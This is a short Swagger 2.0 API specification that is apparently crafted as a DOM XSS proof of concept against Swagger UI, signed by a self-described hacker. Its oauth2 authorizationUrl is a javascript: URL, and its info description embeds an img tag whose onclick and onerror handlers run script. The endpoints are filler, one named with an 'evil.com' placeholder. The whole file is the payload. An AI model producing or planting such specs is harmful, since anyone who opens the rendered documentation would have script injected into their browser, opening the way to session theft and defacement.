swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert("XSS Hack alert By Drocapy")//
info:
  version: "1.0.0"
  title: DOM XSS Hack Image & Javascript Code by Drocapy
  description: Hack By Drocapy <img src=https://academy.avast.com/hubfs/New_Avast_Academy/Hackers/Hacker-Hero-a1.png onclick="alert(2)" onerror="alert(3)">////
paths:
  /Drocapy:
    get:
      responses:
        '200':
          description: Successful response
      tags:
        - Drocapy
      operationId: find Accounts
      summary: Finds all accounts
  '/hack/hachid/{evil.com}':
    delete:
      parameters:
        - description: 
            Successful response
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
